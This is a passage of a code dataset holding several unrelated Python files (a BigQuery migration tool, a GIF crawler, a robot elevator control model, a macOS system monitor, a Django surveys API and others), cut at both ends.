\"{dest_field_name}\" is set to unexpected value \"{dest_field_mode}\".'\n )\n return col\n\n\ndef get_copy_table_query(project_id, dataset_id, table_id, client):\n\n try:\n source_table = f'{project_id}.{dataset_id}.{table_id}'\n source_fields = snapshot_by_query.get_source_fields(\n client, source_table)\n dst_fields = resources.fields_for(table_id)\n col_cast_exprs = [\n get_field_cast_expr_with_schema_change(field, source_fields)\n for field in dst_fields\n ]\n col_expr = ', '.join(col_cast_exprs)\n except (OSError, IOError, RuntimeError):\n # default to select *\n col_expr = '*'\n select_all_query = 
'SELECT {col_expr} FROM `{project_id}.{dataset_id}.{table_id}`'\n return select_all_query.format(col_expr=col_expr,\n project_id=project_id,\n dataset_id=dataset_id,\n table_id=table_id)\n\n\ndef schema_upgrade_cdm52_to_cdm531(project_id,\n dataset_id,\n snapshot_dataset_id,\n overwrite_existing=True):\n \"\"\"\n :param project_id:\n :param dataset_id:\n :param snapshot_dataset_id:\n :param overwrite_existing: Default is True, False if a dataset is already created.\n :return:\n \"\"\"\n if overwrite_existing:\n snapshot_by_query.create_empty_dataset(project_id, dataset_id,\n snapshot_dataset_id)\n\n snapshot_by_query.create_empty_cdm_tables(snapshot_dataset_id)\n\n copy_table_job_ids = []\n client = bq.get_client(project_id)\n for table_id in list_all_table_ids(dataset_id):\n q = get_copy_table_query(project_id, dataset_id, table_id, client)\n results = query(q,\n use_legacy_sql=False,\n destination_table_id=table_id,\n destination_dataset_id=snapshot_dataset_id,\n batch=True)\n copy_table_job_ids.append(results['jobReference']['jobId'])\n incomplete_jobs = wait_on_jobs(copy_table_job_ids)\n if len(incomplete_jobs) > 0:\n raise BigQueryJobWaitError(incomplete_jobs)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Parse project_id and dataset_id',\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\n '-p',\n '--project_id',\n action='store',\n dest='project_id',\n help='Project associated with the input and output datasets',\n required=True)\n parser.add_argument('-d',\n '--dataset_id',\n action='store',\n dest='dataset_id',\n help='Dataset where cleaning rules are to be applied',\n required=True)\n parser.add_argument('-n',\n '--snapshot_dataset_id',\n action='store',\n dest='snapshot_dataset_id',\n help='Name of the new dataset that needs to be created',\n required=True)\n args = parser.parse_args()\n\n schema_upgrade_cdm52_to_cdm531(args.project_id, args.dataset_id,\n 
args.snapshot_dataset_id)\n","sub_path":"data_steward/tools/migrate_cdm52_to_cdm531.py","file_name":"migrate_cdm52_to_cdm531.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"399140684","text":"from bst_class import BinarySearchTree\n\nINPUT_FILE = \"task3.in\"\n\nt = BinarySearchTree()\n\nwith open(INPUT_FILE) as f:\n s = f.readline()\n while s:\n t.insert(int(s))\n s = f.readline()\n\nx = int(input())\n\nif x in t:\n t.remove(x)\n print(\"{} was found in tree and removed successfully.\".format(x))\nelse:\n print(\"{} was not found in tree.\".format(x))\n\nt.traverses()\n","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"89379998","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport bs4\nimport os\nimport requests\nimport shutil\nimport sys\nsys.path.append('../template')\nimport mparameter\n\n\nPAGE_SIZE = 100\n\nOUTDIR = 'temp'\nOUTPATH = os.getcwd()\nOUTPATH = os.path.join(OUTPATH, OUTDIR)\nif os.path.exists(OUTPATH):\n shutil.rmtree(OUTPATH)\nos.mkdir(OUTPATH)\n\n\nclass BaozouSpider(object):\n\n def __init__(self, index):\n self.index = index\n self.url = \"http://baozoumanhua.com/gif/month/page/\"\n\n def retrieve_page(self):\n url = self.url + str(self.index)\n pm = mparameter.Parameter()\n headers = pm.get_headers()\n proxies = pm.get_proxies()\n soup = \"FLAG\"\n try:\n response = requests.get(\n url, proxies, headers=headers, timeout=5)\n status = response.status_code\n if status == 200:\n soup = bs4.BeautifulSoup(response.text, \"lxml\")\n else:\n print(\"%s error to reach the server %s\" % (status, url))\n except Exception:\n print(\"Error happens! 
Please check your requests.\")\n return soup\n\n def get_imgurl(self, soup):\n temp = soup.select('.img-wrap img')\n imgurl = [img['src'] for img in temp]\n return imgurl\n\n def get_img(self, url, fileloc):\n pm = mparameter.Parameter()\n headers = pm.get_headers()\n proxies = pm.get_proxies()\n try:\n response = requests.get(url, proxies, headers=headers,\n timeout=5, stream=True)\n status = response.status_code\n if status == 200:\n with open(fileloc, 'wb') as f:\n response.raw.decode_content = True\n shutil.copyfileobj(response.raw, f)\n for chunk in response.iter_content(1024):\n f.write(chunk)\n else:\n print(\"%s error to reach the server %s\" % (status, url))\n except Exception:\n print(\"Error happens! Please check your requests.\")\n\n def retrieve_content(self, soup):\n if soup != \"FLAG\":\n num = 1\n imgurl = self.get_imgurl(soup)\n print((\"Gif number in page %d: %d\" % (self.index, len(imgurl))))\n for x in imgurl:\n imgname = str(self.index) + '_' + str(num)\n fileloc = OUTPATH + os.sep + imgname + \".gif\"\n print(fileloc)\n num += 1\n self.get_img(x, fileloc)\n\n\ndef main():\n print(\"\"\"\n ###############################\n\n BaoZou Gif Crawler\n Author: Ke Yi\n\n ###############################\n \"\"\")\n print(\"Baozou Gif Crawler Begins...\")\n for i in range(1, PAGE_SIZE + 1):\n my_spider = BaozouSpider(i)\n my_soup = my_spider.retrieve_page()\n my_spider.retrieve_content(my_soup)\n print(\"Baozou Gif Crawler Ends.\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Spider_Projects/baozou/baozou.py","file_name":"baozou.py","file_ext":"py","file_size_in_byte":2978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"23981532","text":"# -*- coding: utf-8 -*-\r\n\r\nimport base64\r\nimport os\r\nimport sys\r\nimport requests\r\nimport json\r\nfrom pprint import pprint\r\n\r\nupload_endpoint = \"http://localhost:5000/api/v1/images/add\"\r\n\r\ndef encodeBody( path=None ):\r\n with open( 
path, \"rb\" ) as image_file:\r\n encoded_string = base64.b64encode( image_file.read() )\r\n base64_message = encoded_string.decode( 'utf-8' )\r\n return { \"filename\": os.path.basename( path ), \"img\": base64_message }\r\n\r\n\r\ndef postImage( path=None ):\r\n r = requests.post( upload_endpoint, verify=False, json=encodeBody( path=path ) )\r\n pprint( r.json() )\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n image_path = sys.argv[1]\r\n if os.path.isdir( image_path ):\r\n for ( dirpath, dirnames, filenames ) in os.walk( image_path ):\r\n for filename in filenames:\r\n postImage( path=os.path.join( dirpath, filename ) )\r\n else:\r\n postImage( path=image_path )\r\n \r\n \r\n ","sub_path":"add_image.py","file_name":"add_image.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"225836212","text":"#!/usr/bin/python\n\nfrom frc971.control_loops.python import control_loop\nfrom frc971.control_loops.python import controls\nfrom frc971.control_loops.python import polytope\nimport numpy\nimport sys\nimport matplotlib\nfrom matplotlib import pylab\n\nimport gflags\nimport glog\n\nFLAGS = gflags.FLAGS\n\ngflags.DEFINE_bool('plot', False, 'If true, plot the loop response.')\n\n\nclass Elevator(control_loop.ControlLoop):\n def __init__(self, name=\"Elevator\", mass=None):\n super(Elevator, self).__init__(name)\n # Stall Torque in N m\n self.stall_torque = 0.476\n # Stall Current in Amps\n self.stall_current = 80.730\n # Free Speed in RPM\n self.free_speed = 13906.0\n # Free Current in Amps\n self.free_current = 5.820\n # Mass of the elevator\n if mass is None:\n self.mass = 13.0\n else:\n self.mass = mass\n\n # Resistance of the motor\n self.R = 12.0 / self.stall_current\n # Motor velocity constant\n self.Kv = ((self.free_speed / 60.0 * 2.0 * numpy.pi) /\n (12.0 - self.R * self.free_current))\n # Torque constant\n self.Kt = self.stall_torque / self.stall_current\n # Gear 
ratio\n self.G = (56.0 / 12.0) * (84.0 / 14.0)\n # Pulley diameter\n self.r = 32 * 0.005 / numpy.pi / 2.0\n # Control loop time step\n self.dt = 0.005\n\n # Elevator left/right spring constant (N/m)\n self.spring = 800.0\n\n # State is [average position, average velocity,\n # position difference/2, velocity difference/2]\n # Input is [V_left, V_right]\n\n C1 = self.spring / (self.mass * 0.5)\n C2 = self.Kt * self.G / (self.mass * 0.5 * self.r * self.R)\n C3 = self.G * self.G * self.Kt / (\n self.R * self.r * self.r * self.mass * 0.5 * self.Kv)\n\n self.A_continuous = numpy.matrix(\n [[0, 1, 0, 0],\n [0, -C3, 0, 0],\n [0, 0, 0, 1],\n [0, 0, -C1 * 2.0, -C3]])\n\n glog.debug('Full speed is', C2 / C3 * 12.0)\n\n # Start with the unmodified input\n self.B_continuous = numpy.matrix(\n [[0, 0],\n [C2 / 2.0, C2 / 2.0],\n [0, 0],\n [C2 / 2.0, -C2 / 2.0]])\n\n self.C = numpy.matrix([[1, 0, 1, 0],\n [1, 0, -1, 0]])\n self.D = numpy.matrix([[0, 0],\n [0, 0]])\n\n self.A, self.B = self.ContinuousToDiscrete(\n self.A_continuous, self.B_continuous, self.dt)\n\n glog.debug(repr(self.A))\n\n controllability = controls.ctrb(self.A, self.B)\n glog.debug('Rank of augmented controllability matrix: %d',\n numpy.linalg.matrix_rank(controllability))\n\n q_pos = 0.02\n q_vel = 0.400\n q_pos_diff = 0.01\n q_vel_diff = 0.45\n self.Q = numpy.matrix([[(1.0 / (q_pos ** 2.0)), 0.0, 0.0, 0.0],\n [0.0, (1.0 / (q_vel ** 2.0)), 0.0, 0.0],\n [0.0, 0.0, (1.0 / (q_pos_diff ** 2.0)), 0.0],\n [0.0, 0.0, 0.0, (1.0 / (q_vel_diff ** 2.0))]])\n\n self.R = numpy.matrix([[(1.0 / (12.0 ** 2.0)), 0.0],\n [0.0, 1.0 / (12.0 ** 2.0)]])\n self.K = controls.dlqr(self.A, self.B, self.Q, self.R)\n glog.debug(repr(self.K))\n\n glog.debug(repr(numpy.linalg.eig(self.A - self.B * self.K)[0]))\n\n self.rpl = 0.20\n self.ipl = 0.05\n self.PlaceObserverPoles([self.rpl + 1j * self.ipl,\n self.rpl + 1j * self.ipl,\n self.rpl - 1j * self.ipl,\n self.rpl - 1j * self.ipl])\n\n # The box formed by U_min and U_max must encompass all 
possible values,\n # or else Austin's code gets angry.\n self.U_max = numpy.matrix([[12.0], [12.0]])\n self.U_min = numpy.matrix([[-12.0], [-12.0]])\n\n self.InitializeState()\n\n\ndef CapU(U):\n if U[0, 0] - U[1, 0] > 24:\n return numpy.matrix([[12], [-12]])\n elif U[0, 0] - U[1, 0] < -24:\n return numpy.matrix([[-12], [12]])\n else:\n max_u = max(U[0, 0], U[1, 0])\n min_u = min(U[0, 0], U[1, 0])\n if max_u > 12:\n return U - (max_u - 12)\n if min_u < -12:\n return U - (min_u + 12)\n return U\n\n\ndef run_test(elevator, initial_X, goal, max_separation_error=0.01,\n show_graph=False, iterations=200, controller_elevator=None,\n observer_elevator=None):\n \"\"\"Runs the elevator plant with an initial condition and goal.\n\n The tests themselves are not terribly sophisticated; I just test for\n whether the goal has been reached and whether the separation goes\n outside of the initial and goal values by more than max_separation_error.\n Prints out something for a failure of either condition and returns\n False if tests fail.\n Args:\n elevator: elevator object to use.\n initial_X: starting state.\n goal: goal state.\n show_graph: Whether or not to display a graph showing the changing\n states and voltages.\n iterations: Number of timesteps to run the model for.\n controller_elevator: elevator object to get K from, or None if we should\n use elevator.\n observer_elevator: elevator object to use for the observer, or None if we\n should use the actual state.\n \"\"\"\n\n elevator.X = initial_X\n\n if controller_elevator is None:\n controller_elevator = elevator\n\n if observer_elevator is not None:\n observer_elevator.X_hat = initial_X + 0.01\n observer_elevator.X_hat = initial_X\n\n # Various lists for graphing things.\n t = []\n x_avg = []\n x_sep = []\n x_hat_avg = []\n x_hat_sep = []\n v_avg = []\n v_sep = []\n u_left = []\n u_right = []\n\n sep_plot_gain = 100.0\n\n for i in xrange(iterations):\n X_hat = elevator.X\n if observer_elevator is not None:\n X_hat = 
observer_elevator.X_hat\n x_hat_avg.append(observer_elevator.X_hat[0, 0])\n x_hat_sep.append(observer_elevator.X_hat[2, 0] * sep_plot_gain)\n U = controller_elevator.K * (goal - X_hat)\n U = CapU(U)\n x_avg.append(elevator.X[0, 0])\n v_avg.append(elevator.X[1, 0])\n x_sep.append(elevator.X[2, 0] * sep_plot_gain)\n v_sep.append(elevator.X[3, 0])\n if observer_elevator is not None:\n observer_elevator.PredictObserver(U)\n elevator.Update(U)\n if observer_elevator is not None:\n observer_elevator.Y = elevator.Y\n observer_elevator.CorrectObserver(U)\n\n t.append(i * elevator.dt)\n u_left.append(U[0, 0])\n u_right.append(U[1, 0])\n\n glog.debug(repr(numpy.linalg.inv(elevator.A)))\n glog.debug('delta time is %f', elevator.dt)\n glog.debug('Velocity at t=0 is %f %f %f %f', x_avg[0], v_avg[0], x_sep[0], v_sep[0])\n glog.debug('Velocity at t=1+dt is %f %f %f %f', x_avg[1], v_avg[1], x_sep[1], v_sep[1])\n\n if show_graph:\n pylab.subplot(2, 1, 1)\n pylab.plot(t, x_avg, label='x avg')\n pylab.plot(t, x_sep, label='x sep')\n if observer_elevator is not None:\n pylab.plot(t, x_hat_avg, label='x_hat avg')\n pylab.plot(t, x_hat_sep, label='x_hat sep')\n pylab.legend()\n\n pylab.subplot(2, 1, 2)\n pylab.plot(t, u_left, label='u left')\n pylab.plot(t, u_right, label='u right')\n pylab.legend()\n pylab.show()\n\n\ndef main(argv):\n loaded_mass = 25\n #loaded_mass = 0\n elevator = Elevator(mass=13 + loaded_mass)\n elevator_controller = Elevator(mass=13 + 15)\n observer_elevator = Elevator(mass=13 + 15)\n #observer_elevator = None\n\n # Test moving the elevator with constant separation.\n initial_X = numpy.matrix([[0.0], [0.0], [0.01], [0.0]])\n #initial_X = numpy.matrix([[0.0], [0.0], [0.00], [0.0]])\n R = numpy.matrix([[1.0], [0.0], [0.0], [0.0]])\n run_test(elevator, initial_X, R, controller_elevator=elevator_controller,\n observer_elevator=observer_elevator)\n\n # Write the generated constants out to a file.\n if len(argv) != 3:\n glog.fatal('Expected .h file name and .cc file 
name for the elevator.')\n else:\n namespaces = ['y2015', 'control_loops', 'fridge']\n elevator = Elevator(\"Elevator\")\n loop_writer = control_loop.ControlLoopWriter(\"Elevator\", [elevator],\n namespaces=namespaces)\n if argv[1][-3:] == '.cc':\n loop_writer.Write(argv[2], argv[1])\n else:\n loop_writer.Write(argv[1], argv[2])\n\nif __name__ == '__main__':\n argv = FLAGS(sys.argv)\n glog.init()\n sys.exit(main(argv))\n","sub_path":"2017/code-snapshot/y2015/control_loops/python/elevator.py","file_name":"elevator.py","file_ext":"py","file_size_in_byte":8151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"305117475","text":"# MIT License\n#\n# Copyright (c) 2017 Ray Chen \n\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\n# DEALINGS IN THE SOFTWARE.\n\nimport math\nimport psutil\nfrom PyObjCTools import AppHelper\nfrom Foundation import NSTimer, NSRunLoop\nfrom AppKit import NSApplication, NSStatusBar, NSMenu, NSMenuItem, \\\n NSEventTrackingRunLoopMode\n\n\ndef bytes2human(n):\n # Credits to /u/cyberspacecowboy on reddit\n # https://www.reddit.com/r/Python/comments/5xukpd/-/dem5k12/\n symbols = (' B', ' KiB', ' MiB', ' GiB', ' TiB', ' PiB', ' EiB', ' ZiB',\n ' YiB')\n i = math.floor(math.log(abs(n)+1, 2) / 10)\n return '%.1f%s' % (n/2**(i*10), symbols[i])\n\n\nclass Harold(NSApplication):\n\n def finishLaunching(self):\n self._setup_menuBar()\n\n # Create a timer which fires the update_ method every 1second,\n # and add it to the runloop\n NSRunLoop.currentRunLoop().addTimer_forMode_(\n NSTimer\n .scheduledTimerWithTimeInterval_target_selector_userInfo_repeats_(\n 1, self, 'update:', '', True\n ),\n NSEventTrackingRunLoopMode\n )\n\n print('Harold is now running.')\n print('CTRL+C does not work here.')\n print('You can quit through the menubar (Harold -> Quit).')\n\n def update_(self, timer):\n\n # System\n cpu_usage = psutil.cpu_percent()\n ram_usage = psutil.virtual_memory().percent\n avail_mem = bytes2human(psutil.virtual_memory().available)\n self.CPU_USAGE.setTitle_('CPU Usage: {}%'.format(cpu_usage))\n self.RAM_USAGE.setTitle_('RAM Usage: {}%'.format(ram_usage))\n self.RAM_AVAILABLE.setTitle_('Available Memory: {}'.format(avail_mem))\n\n # Disk I/O\n disk_io = psutil.disk_io_counters()\n disk_data_read = bytes2human(disk_io.read_bytes)\n disk_data_written = bytes2human(disk_io.write_bytes)\n\n self.DATA_READ.setTitle_('Read: {}'.format(disk_data_read))\n self.DATA_WRITTEN.setTitle_('Written: {}'.format(disk_data_written))\n\n # Network\n 
network_io = psutil.net_io_counters()\n network_recv = bytes2human(network_io.bytes_recv)\n network_sent = bytes2human(network_io.bytes_sent)\n\n self.NETWORK_RECV.setTitle_('Received: {}'.format(network_recv))\n self.NETWORK_SENT.setTitle_('Sent: {}'.format(network_sent))\n\n def _setup_menuBar(self):\n statusBar = NSStatusBar.systemStatusBar()\n self.statusItem = statusBar.statusItemWithLength_(-1)\n self.menuBar = NSMenu.alloc().init()\n\n self.statusItem.setTitle_('Harold')\n\n # Labels/buttons\n self.SYSTEM = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n 'System', 'doNothing:', ''\n )\n self.DISKIO = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n 'Disk I/O', 'doNothing:', ''\n )\n self.NETWORK = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n 'Network', 'doNothing:', ''\n )\n self.QUIT = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n 'Quit', 'terminate:', ''\n )\n\n # System\n self.CPU_USAGE = self._create_empty_menu_item()\n self.RAM_USAGE = self._create_empty_menu_item()\n self.RAM_AVAILABLE = self._create_empty_menu_item()\n\n # Disk I/O\n self.DATA_READ = self._create_empty_menu_item()\n self.DATA_WRITTEN = self._create_empty_menu_item()\n\n # Network\n self.NETWORK_RECV = self._create_empty_menu_item()\n self.NETWORK_SENT = self._create_empty_menu_item()\n\n '''\n Add our items to the menuBar - yields the following output:\n\n Harold\n System\n CPU Usage\n RAM Usage\n Available Memory\n Disk I/O\n Read\n Written\n Network\n Received\n Sent\n -----------------------\n Quit\n '''\n self.menuBar.addItem_(self.SYSTEM) # system label\n self.menuBar.addItem_(self.CPU_USAGE)\n self.menuBar.addItem_(self.RAM_USAGE)\n self.menuBar.addItem_(self.RAM_AVAILABLE)\n\n self.menuBar.addItem_(self.DISKIO) # disk I/O label\n self.menuBar.addItem_(self.DATA_READ)\n self.menuBar.addItem_(self.DATA_WRITTEN)\n\n self.menuBar.addItem_(self.NETWORK) # network label\n self.menuBar.addItem_(self.NETWORK_RECV)\n 
self.menuBar.addItem_(self.NETWORK_SENT)\n\n self.menuBar.addItem_(NSMenuItem.separatorItem()) # seperator\n self.menuBar.addItem_(self.QUIT) # quit button\n\n # Add menu to status bar\n self.statusItem.setMenu_(self.menuBar)\n\n def _create_empty_menu_item(self):\n return NSMenuItem \\\n .alloc().initWithTitle_action_keyEquivalent_('', '', '')\n\n def doNothing_(self, sender):\n # hack to enable menuItems by passing them this method as action\n # setEnabled_ isn't working, so this should do for now (achieves\n # the same thing)\n pass\n\n\nif __name__ == '__main__':\n app = Harold.sharedApplication()\n AppHelper.runEventLoop()\n","sub_path":"harold.py","file_name":"harold.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"96232164","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport plotly.express as px\ndef main():\n\tdf = load_data()\n\tst.title('covid-19 country-wise tracking and comparison')\n\tcountries = df.Country.unique()\n\tselected_countries = st.sidebar.multiselect('Select Countries to compare', countries)\n\tif selected_countries:\n\t\tsubset_df = df[df.Country.isin(selected_countries)]\n\telse:\n\t\tsubset_df = df[df.Country.isin(['India'])]\n\tfig1 = px.line(subset_df, x=\"Date\", y=\"Confirmed\", color='Country')\n\tfig2 = px.line(subset_df, x=\"Date\", y=\"Recovered\", color='Country')\n\tfig3 = px.line(subset_df, x=\"Date\", y=\"Deaths\", color='Country')\n\tst.header('Confirmed Cases')\n\tst.write(fig1)\n\tst.header('Recovered Cases')\n\tst.write(fig2)\n\tst.header('Deaths')\n\tst.write(fig3)\n\tst.markdown('''---''')\n\tst.markdown('Contributors')\n\tst.markdown('Supan Shah - https://github.com/Supan14')\n\tst.markdown('Harsh Thakkar - https://github.com/ht2631999')\n\t\n@st.cache\ndef load_data():\n\treturn 
pd.read_csv('https://raw.githubusercontent.com/datasets/covid-19/master/data/countries-aggregated.csv')\nif __name__ == '__main__':\n\tmain()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"267649640","text":"import struct\n\ntype_name_to_struct = {\n 'uint8': 'B',\n 'uint16': 'H',\n 'uint32': 'I',\n 'uint64': 'Q',\n 'int8': 'b',\n 'int16': 'h',\n 'int32': 'i',\n 'int64': 'q',\n 'float': 'f',\n 'double': 'd',\n 'char': 'c',\n 'str': 's',\n}\n\ntype_lengths = {\n 'uint8': 1,\n 'uint16': 2,\n 'uint32': 4,\n 'uint64': 8,\n 'int8': 1,\n 'int16': 2,\n 'int32': 4,\n 'int64': 8,\n 'float': 4,\n 'double': 8,\n 'char': 1,\n 'str': 1,\n}\n\n\nclass BinaryReader:\n def __init__(self, stream, endianness='little'):\n self.stream = stream\n self.endian = '<' if endianness == 'little' else '>'\n\n def read(self, data_type, num=1):\n if num == 0:\n return b''\n\n length = type_lengths[data_type] * num\n fmt_str = '{}{}{}'.format(self.endian, num, type_name_to_struct[data_type])\n b = self.stream.read(length)\n if b == b'':\n raise IOError(\"End of stream reached\")\n\n # unpack returns a tuple even if the format string\n # has only one element\n if num > 1 and data_type != 'str':\n return struct.unpack(fmt_str, b)\n return struct.unpack(fmt_str, b)[0]\n\n def read_raw(self, data_type):\n return self.stream.read(type_lengths[data_type])\n\n\nclass BinaryWriter:\n def __init__(self, stream, endianness='little'):\n self.stream = stream\n self.endian = '<' if endianness == 'little' else '>'\n\n def write(self, values, data_type, num=1):\n fmt_str = '{}{}{}'.format(self.endian, num, type_name_to_struct[data_type])\n\n if num > 1 and data_type != 'str':\n b = struct.pack(fmt_str, *values)\n else:\n b = struct.pack(fmt_str, values)\n return self.stream.write(b)\n\n def write_raw(self, b):\n return 
self.stream.write(b)\n","sub_path":"pylas/lasio.py","file_name":"lasio.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"315723864","text":"#!/usr/bin/python3\n# 2018.01.21 20:46:41 CST\nimport cv2\n\n# Capturing video through webcam \nstream = cv2.VideoCapture('/Users/joao/Downloads/mixed.mp4')\n_, img = stream.read()\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n# red\n# mask = cv2.inRange(hsv,(136, 87, 110), (180, 255, 255))\n\n# blue\nmask = cv2.inRange(hsv,(94, 80, 110), (120, 255, 255))\n\ncv2.imshow(\"orange\", mask);cv2.waitKey();cv2.destroyAllWindows()","sub_path":"scripts/get-hsv-range.py","file_name":"get-hsv-range.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"390048016","text":"# -*- coding: utf-8 -*-\r\n\r\n# =============================================================================\r\n# Created on Sat Aug 31 02:35:37 2019\r\n#\r\n# @author: Brénainn Woodsend\r\n#\r\n#\r\n# test_mesh_plot.py tests the contents of vtkplotlib.plots.MeshPlot.py.\r\n# Copyright (C) 2019 Brénainn Woodsend\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program. 
If not, see .\r\n# =============================================================================\r\n\r\n\r\nimport numpy as np\r\nimport sys\r\nimport os\r\nfrom pathlib2 import Path\r\n\r\nimport vtkplotlib as vpl\r\nfrom unittest import TestCase, skipUnless, main\r\n\r\npath = vpl.data.get_rabbit_stl()\r\n\r\n\r\nclass TestMeshPlot(TestCase):\r\n\r\n @skipUnless(vpl.NUMPY_STL_AVAILABLE, \"Requires numpy-stl\")\r\n def test_type_normalise(self):\r\n from stl.mesh import Mesh\r\n mesh = Mesh.from_file(path)\r\n vectors = mesh.vectors\r\n\r\n unique_points = set(tuple(i) for i in vectors.reshape(len(vectors) * 3, 3))\r\n points_enum = {point: i for (i, point) in enumerate(unique_points)}\r\n\r\n points = np.array(sorted(unique_points, key=points_enum.get))\r\n point_args = np.apply_along_axis(lambda x: points_enum[tuple(x)], -1, vectors)\r\n\r\n vpl.plots.MeshPlot.NUMPY_STL_AVAILABLE = False\r\n\r\n for fmt in (path, mesh, vectors, (points, point_args)):\r\n normalised = vpl.mesh_plot(fmt).vectors\r\n self.assertTrue(np.array_equal(normalised, vectors))\r\n\r\n vpl.plots.MeshPlot.NUMPY_STL_AVAILABLE = True\r\n\r\n vpl.close()\r\n\r\n vpl.plots.MeshPlot.test()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"venv/lib/python3.7/site-packages/vtkplotlib/tests/test_mesh_plot.py","file_name":"test_mesh_plot.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"21711594","text":"\"\"\"Surveys routes handler\"\"\"\n\nfrom django.core.exceptions import ValidationError\n\nfrom surveysAPI.models.survey import Survey\nfrom . 
import helper\n\n\ndef index(request, survey_id = None):\n \"\"\"Dispatches GET, POST and PATCH requests to surveys.\"\"\"\n request_body = {}\n\n # Expect and extract a JSON body from POST and PATCH requests\n if request.method == 'POST' or request.method == 'PATCH':\n request_body = helper.convert_request(request)\n\n if request_body is None:\n return helper.invalid_request('Your request did not contain valid JSON.')\n\n # A specific survey was requested\n if survey_id is not None:\n if request.method == 'GET':\n return show_single(request, survey_id)\n if request.method == 'PATCH':\n return update(survey_id, request_body)\n\n # No specific survey was requested\n else:\n if request.method == 'GET':\n return show(request)\n if request.method == 'POST':\n return create(request_body)\n\n return helper.invalid_route(request)\n\n\ndef show(request):\n \"\"\"Returns surveys created by any user.\"\"\"\n try:\n response = Survey.get_all(request.GET.get('per_page'), request.GET.get('page'))\n response['results'] = helper.convert_query_set(response['results'])\n\n return helper.success(response)\n\n except ValueError as e:\n return helper.invalid_request('At least one of the filters in your request was invalid.')\n\n\ndef show_single(request, survey_id):\n \"\"\"Returns the survey with the given id.\"\"\"\n if request.method != 'GET':\n return helper.invalid_route(request)\n\n try:\n survey = Survey.objects.get(pk=survey_id)\n return helper.success(helper.convert_single_object(survey))\n\n except Survey.DoesNotExist as dne:\n return helper.requested_object_not_found('survey id')\n\n\ndef create(request_body):\n \"\"\"Creates a new survey.\"\"\"\n user_id = request_body.get('user_id')\n name = request_body.get('name')\n places = request_body.get('places')\n\n try:\n survey = Survey.create(user_id, name, places)\n return helper.success(helper.convert_single_object(survey))\n\n except ValueError as e:\n return helper.invalid_request(\"The 'user_id' must be an integer.\")\n 
except ValidationError as ve:\n return helper.invalid_request(ve.message_dict)\n\n\ndef update(survey_id, request_body):\n \"\"\"Updates a survey.\"\"\"\n name = request_body.get('name')\n places = request_body.get('places')\n\n try:\n survey = Survey.objects.get(pk=survey_id)\n updated_survey = survey.update(name, places)\n if updated_survey is None:\n return helper.invalid_request('The number of places should not be lower than the current number of responses.')\n\n return helper.success(helper.convert_single_object(updated_survey))\n\n except Survey.DoesNotExist as dne:\n return helper.requested_object_not_found('survey id')\n except ValidationError as ve:\n return helper.invalid_request(ve.message_dict)\n\n\ndef responses(request, survey_id):\n \"\"\"Returns the responses submitted to the survey with the given id.\"\"\"\n if request.method != 'GET':\n return helper.invalid_route(request)\n\n try:\n survey = Survey.objects.get(pk=survey_id)\n\n response = survey.get_responses(request.GET.get('per_page'), request.GET.get('page'))\n response['results'] = 